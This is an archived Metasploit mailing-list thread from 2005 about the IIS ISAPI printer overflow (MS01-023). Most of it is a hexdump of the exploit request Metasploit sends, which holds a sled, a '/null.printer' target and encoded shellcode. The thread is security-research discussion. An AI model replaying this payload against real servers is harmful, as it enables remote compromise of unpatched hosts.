Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

[BUG] please confirm

From: nulldevice83 at yahoo.com (Null Device)
Date: Thu, 14 Apr 2005 09:09:55 -0700 (PDT)
thx dave for the link
thx everyone who helped in clearing out this.

--ND
--- Dave C <chaboyd77 at yahoo.com> wrote:


Here is a good link from eEye I found on this:
 


http://list.cineca.it/cgi-bin/wa?A2=ind0106&L=security-archive&F=&S=&P=85839

 
Dave

Dave C <chaboyd77 at yahoo.com> wrote:

 Apart from this, i think the exploit for

printer
vulnerability is not the appropriate exploit.
 
It depends on your definition of "appropriate".  Are
you not able to get it to work?  It works fine
against Sp0 and Sp1.  It is the same vulnerability
patched by MS01-023, but you are right in that it is
not the same exploit vector.  It is in the ISAPI
Printer request processor. In the end both methods
get the same result.  This way just did not get
publicity since eeye posted the Host: header exploit
method and most of the public exploits use that
method.  
 
Dave

Null Device <nulldevice83 at yahoo.com> wrote:
This is wrt to the last mail i sent. 
for IIS Printer vulnerability.
The links given are.
http://www.osvdb.org/548 {This is invalid link }
and 
http://seclists.org/lists/bugtraq/2001/May/0011.html
{points to a thread of openssl vulnerabilities}.

Apart from this, i think the exploit for printer
vulnerability is not the appropriate exploit. please
reffer to my previous mail for details.

Here i am attaching hexdump of the data that is sent
by metasploit for exploiting printer vulnerability.

=============================================
hexdump follows
============================================
00000000 47 45 54 20 68 74 74 70 3a 2f 2f 4e 46 41
40 4e GET http ://NFA at N
00000010 49 49 4e 92 93 27 4f 99 47 9b 47 99 41 41
49 9f IIN..'O. G.G.AAI.
00000020 97 f8 f5 90 f8 43 43 47 96 41 fd 4e 93 97
91 41 .....CCG .A.N...A
00000030 4f 46 43 93 4b 4b 96 37 91 40 4b d6 f9 48
96 97 OFC.KK.7 . at K..H..
00000040 47 93 37 49 4e 48 f8 fd 43 4e f5 91 f8 98
93 99 G.7INH.. CN......
00000050 90 43 9f 97 d6 9b 46 4b 4b 49 d6 91 41 43
97 9b .C....FK KI..AC..
00000060 f8 46 4b 92 99 91 90 46 d6 41 f8 4f fc 4f
42 d6 .FK....F .A.O.OB.
00000070 98 9b f8 93 9f 90 93 42 99 98 4a 9f 4e 40
4e 41 .......B ..J.N at NA
00000080 27 48 f5 40 42 49 41 9b 90 41 47 f9 99 4b
90 93 'H. at BIA. .AG..K..
00000090 4f 42 d6 4e 96 98 41 97 91 93 37 41 fd f9
42 f5 OB.N..A. ..7A..B.
000000A0 98 27 9f 4f f9 27 f8 91 47 91 27 4b 99 41
46 4b .'.O.'.. G.'K.AFK
000000B0 4b f9 49 f9 41 42 9f 91 fc 42 d6 91 fd 40
98 fc K.I.AB.. .B... at ..
000000C0 97 f9 96 90 91 48 97 f9 46 37 46 fc 97 96
f9 92 .....H.. F7F.....
000000D0 d6 4e 9f fd 4b f9 41 fd 4a f8 96 92 41 f8
f8 42 .N..K.A. J...A..B
000000E0 4a 98 37 37 9f 97 4b 47 f8 49 40 49 90 f9
f5 97 J.77..KG .I at I....
000000F0 fd 9b 43 27 41 fc f8 9b d6 43 46 27 37 fd
90 37 ..C'A... .CF'7..7
00000100 90 92 4f 49 37 48 90 43 43 4a 4f 4a 97 98
93 4e ..OI7H.C CJOJ...N
00000110 97 40 37 48 4a fc 49 f3 45 2c 73 41 4e d6
91 27 . at 7HJ.I. E,sAN..'
00000120 46 97 fd 8b 4b 60 80 c1 40 80 c5 01 ff e1
2f 6e F...K`.. @...../n
00000130 75 6c 6c 2e 70 72 69 6e 74 65 72 3f 42 40
41 93 ull.prin ter?B at A.
00000140 46 4f 99 96 27 fc f5 97 f9 93 f5 9f fc 48
92 97 FO..'... .....H..
00000150 90 41 93 27 f8 49 27 4e 91 fd 4b 4b 9f 92
46 49 .A.'.I'N ..KK..FI
00000160 27 46 47 27 fd 93 99 96 48 47 91 96 40 f9
98 43 'FG'.... HG.. at ..C
00000170 fd fc 99 99 9b 37 fc 4e 27 27 96 99 d6 47
93 fc .....7.N ''...G..
00000180 40 49 f5 91 4b 27 9f d6 4a 47 46 48 4b 43
41 42 @I..K'.. JGFHKCAB
00000190 f8 48 f9 f9 f5 f5 97 f9 42 47 9f 4e 9f 97
4f 9f .H...... BG.N..O.
000001A0 41 f5 46 43 f5 40 97 47 90 40 49 40 9f f9
4e fc A.FC. at .G . at I@..N.
000001B0 48 48 93 4b f9 48 fc 48 93 99 98 99 98 49
f8 97 HH.K.H.H .....I..
000001C0 47 27 37 43 d6 4b f5 f8 4e f5 f8 99 40 d6
46 46 G'7C.K.. N... at .FF
000001D0 90 90 fc 91 93 4b 48 92 93 96 99 91 f8 37
fc 37 .....KH. .....7.7
000001E0 f9 f5 4f 97 48 4a 9f d6 f8 48 4f 4e 40 4f
40 f5 ..O.HJ.. .HON at O@.
000001F0 4f 98 fd 43 4b d6 91 37 40 48 42 49 4a 47
4f fd O..CK..7 @HBIJGO.
00000200 27 fd 96 42 49 27 91 4a 9f fd fc 46 96 27
47 d6 '..BI'.J ...F.'G.
00000210 f9 9f 96 4a 92 97 27 4f 96 fd 43 96 9b f5
4f 4b ...J..'O ..C...OK
00000220 91 93 f5 40 4a fc f9 42 41 4e 47 91 43 4a
98 4a ... at J..B ANG.CJ.J
00000230 99 43 4b 27 99 fc 90 92 37 93 fc 47 41 90
f8 40 .CK'.... 7..GA..@
00000240 49 f5 f9 91 93 d6 90 93 91 49 91 43 99 48
97 96 I....... .I.C.H..
00000250 43 42 41 99 97 d6 42 4f 41 91 92 f9 9f d6
f8 f9 CBA...BO A.......
00000260 f9 49 d6 d6 96 90 40 4e fc 4e 4b 97 46 4b
37 47 .I.... at N .NK.FK7G
00000270 90 92 96 49 4a 9f 41 27 41 f9 92 9b 48 43
46 4a ...IJ.A' A...HCFJ
00000280 40 d6 49 d6 4a 46 4b 47 98 9f 4f 42 41 9b
4b 97 @.I.JFKG ..OBA.K.
00000290 f5 4b f8 f5 42 43 37 98 98 f5 4a 4a 91 91
98 fd .K..BC7. ..JJ....
000002A0 f5 41 41 97 99 f8 47 47 96 37 fc f9 93 41
9f 92 .AA...GG .7...A..
000002B0 92 37 37 d6 d6 93 47 97 99 27 9f 4e 91 9f
f8 f8 .77...G. .'.N....
000002C0 4f 4b 42 f9 99 92 41 40 90 46 96 4e 37 93
d6 91 OKB...A@ .F.N7...
000002D0 47 f9 fd 46 47 91 4f f5 90 4f 9b 47 f8 43
42 41 G..FG.O. .O.G.CBA
000002E0 4e 97 49 4a 9f 97 d6 99 d6 97 4a 4e 49 43
97 4e N.IJ.... ..JNIC.N
000002F0 93 97 9f 49 4a 92 97 fd 4e 91 46 97 4a d6
98 41 ...IJ... N.F.J..A
00000300 9b 42 4a 47 4b fc 97 4e 47 42 98 49 4e 4f
91 43 .BJGK..N GB.INO.C
00000310 47 91 99 92 96 d6 48 96 27 97 49 42 93 f9
d6 d6 G.....H. '.IB....
00000320 98 97 43 47 4f f5 4f 47 42 99 90 37 fd 48
4f 90 ..CGO.OG B..7.HO.
00000330 f5 4b f5 48 98 f8 98 9f 92 4b 46 92 37 98
90 4b .K.H.... .KF.7..K
00000340 98 98 37 47 fc 91 4b 49 fc 90 f9 99 37 4a
43 f9 ..7G..KI ....7JC.
00000350 9f 92 fd 4e 4f fd 47 90 42 49 42 f5 9b 9b
40 41 ...NO.G. BIB... at A
00000360 48 48 49 96 37 96 6a 51 59 d9 ee d9 74 24
f4 5b HHI.7.jQ Y...t$.[
00000370 81 73 13 92 39 51 b2 83 eb fc e2 f4 6e 53
ba fd .s..9Q.. ....nS..
00000380 7a c0 ae 4d 6d 59 da de b6 1d da f7 ae b2
2d b7 z..MmY.. ......-.
00000390 ea 38 be 39 dd 21 da ed b2 38 ba 51 a2 70
da 86 .8.9.!.. .8.Q.p..
000003A0 19 38 bf 83 52 a0 fd 36 52 4d 56 73 58 34
50 70 .8..R..6 RMVsX4Pp
000003B0 79 cd 6a e6 b6 11 24 51 19 66 75 b3 79 5f
da be y.j...$Q .fu.y_..
000003C0 d9 b2 0e ae 93 d2 52 9e 19 b0 3d 96 8e 58
92 83 ......R. ..=..X..
000003D0 52 5d da f2 a2 b2 11 be 19 49 4d 1f 19 79
59 ec R]...... .IM..yY.
000003E0 fa b7 1f bc 7e 69 ae 64 a3 e2 37 e1 f4 51
62 80 ....~i.d ..7..Qb.
000003F0 fa 4e 22 80 cd 6d ae 62 fa f2 bc 4e a9 69
ae 64 .N"..m.b ...N.i.d
00000400 cd b0 b4 d4 13 d4 59 b0 c7 53 53 4d 42 51
88 bb ......Y. .SSMBQ..
00000410 67 94 06 4d 44 6a 02 e1 c1 6a 12 e1 d1 6a
ae 62 g..MDj.. .j...j.b
00000420 f4 51 40 ee f4 6a d8 53 07 51 f5 a8 e2 fe
06 4d .Q at ..j.S .Q.....M
00000430 44 53 41 e3 c7 c6 81 da 36 94 7f 5b c5 c6
87 e1 DSA..... 6..[....
00000440 c7 c6 81 da 77 70 d7 fb c5 c6 87 e2 c6 6d
04 4d ....wp.. .....m.M
00000450 42 aa 39 55 eb ff 28 e5 6d ef 04 4d 42 5f
3b d6 B.9U..(. m..MB_;.
00000460 f4 51 32 df 1b dc 3b e2 cb 10 9d 3b 75 53
15 3b .Q2...;. ...;uS.;
00000470 70 08 91 41 38 c7 13 9f 6c 7b 7d 21 1f 43
69 19 p..A8... l{}!.Ci.
00000480 39 92 39 c0 6c 8a 47 4d e7 7d ae 64 c9 6e
03 e3 9.9.l.GM .}.d.n..
00000490 c3 68 3b b3 c3 68 04 e3 6d e9 39 1f 4b 3c
9f e1 .h;..h.. m.9.K<..
000004A0 6d ef 3b 4d 6d 0e ae 62 19 6e ad 31 56 5d
ae 64 m.;Mm..b .n.1V].d
000004B0 c0 c6 81 da 62 b3 55 ed c1 c6 87 4d 42 39
51 b2 ....b.U. ...MB9Q.
000004C0 20 48 54 54 50 2f 31 2e 30 0d 0a 0d 0a 
HTTP/1. 0....
===============================================
hexdump
===============================================



=== message truncated ===



                
__________________________________ 
Do you Yahoo!? 
Yahoo! Small Business - Try our new resources site!
http://smallbusiness.yahoo.com/resources/
Previous By Date Next
Previous By Thread Next

Current thread: